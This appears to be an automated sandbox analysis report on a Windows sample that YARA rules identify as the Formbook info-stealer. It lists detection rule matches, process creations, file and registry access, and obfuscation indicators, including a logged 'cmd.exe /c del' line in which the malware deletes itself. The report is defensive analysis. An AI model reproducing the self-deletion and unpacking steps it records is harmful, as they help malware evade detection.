            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@18/12
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
            Source: JdtN8nIcLi8RQOi.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WWAHost.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: JdtN8nIcLi8RQOi.exe | ReversingLabs: Detection: 21%
            Source: unknown | Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknown | Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: JdtN8nIcLi8RQOi.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: JdtN8nIcLi8RQOi.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
            Source: Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: JdtN8nIcLi8RQOi.exe, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.JdtN8nIcLi8RQOi.exe.6a0000.1.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.JdtN8nIcLi8RQOi.exe.6a0000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 0_2_01BAD0F4 push ecx; retf 0_2_01BAD0F5
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0041604B pushfd ; retf 1_2_0041604C
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_00407008 push esi; ret 1_2_00407009
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0041B3FB push eax; ret 1_2_0041B462
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0041B45C push eax; ret 1_2_0041B462
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 1_2_0118D0D1 push ecx; ret 1_2_0118D0E4
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_031AD0D1 push ecx; ret 6_2_031AD0E4
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_00327008 push esi; ret 6_2_00327009
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_0033604B pushfd ; retf 6_2_0033604C
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_0033B3A5 push eax; ret 6_2_0033B3F8
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_0033B3F2 push eax; ret 6_2_0033B3F8
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_0033B3FB push eax; ret 6_2_0033B462
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 6_2_0033B45C push eax; ret 6_2_0033B462
            Source: initial sample | Static PE information: section name: .text entropy: 7.21231975694
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Process information set: NOOPENFILEERRORBOX